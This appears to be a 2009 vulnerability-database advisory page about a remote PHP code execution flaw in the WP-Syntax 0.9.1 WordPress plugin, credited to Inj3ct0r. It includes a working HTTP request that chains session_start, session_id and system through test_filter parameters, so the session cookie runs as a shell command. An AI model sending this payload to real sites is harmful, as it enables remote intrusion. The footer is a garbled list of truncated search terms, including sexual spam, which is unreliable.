about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , WordPress Plugin WP-Syntax Remote PHP Code Execution Vulnerability


Title WordPress Plugin WP-Syntax Remote PHP Code Execution Vulnerability
Published 2009-08-13-12:00AM
Updated 2009-08-21-07:33PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Inj3ct0r
Vulnerable  WPSyntax WPSyntax 0.9.1
Not Vulnerable  WordPress WordPress 2.8.4
Code  Attackers may exploit this issue through a browser.The following example HTTP request is available:GET /wp-content/plugins/wp-syntax/test/index.php?test_filter[wp_head][99][0]=session_start&test_filter[wp_head][99][1]=session_id&test_filter[wp_head][99][2]=system HTTP/1.0
Host: localhost
Cookie: PHPSESSID=dir
Connection: close
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 28 Nov 2009 17:22:47 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.scorel lo18l 200+/compo news for c search/exp SEX DOG AN Adiliahors Privilege 2...tion=c Live messe shan.youxi mambo Remo php calned www.galatt Ninethrase PhonErotic Kerio Mail 9940754989 six open p playstatio Japansex.c t123t siran synkron /search/ex Japansex.c cewe bogel n...l/form tool send ?0 compone www.shahva mambo Remo n...l/form Ninethara WWW.Pink w MS-06040 \\\ Apache 2.2 blog.zaibi www.aofwow http://sec 2.../../et protocol Sophia lac sxe downlo gold coder free xxx i Www. sex f lndian sex www.indian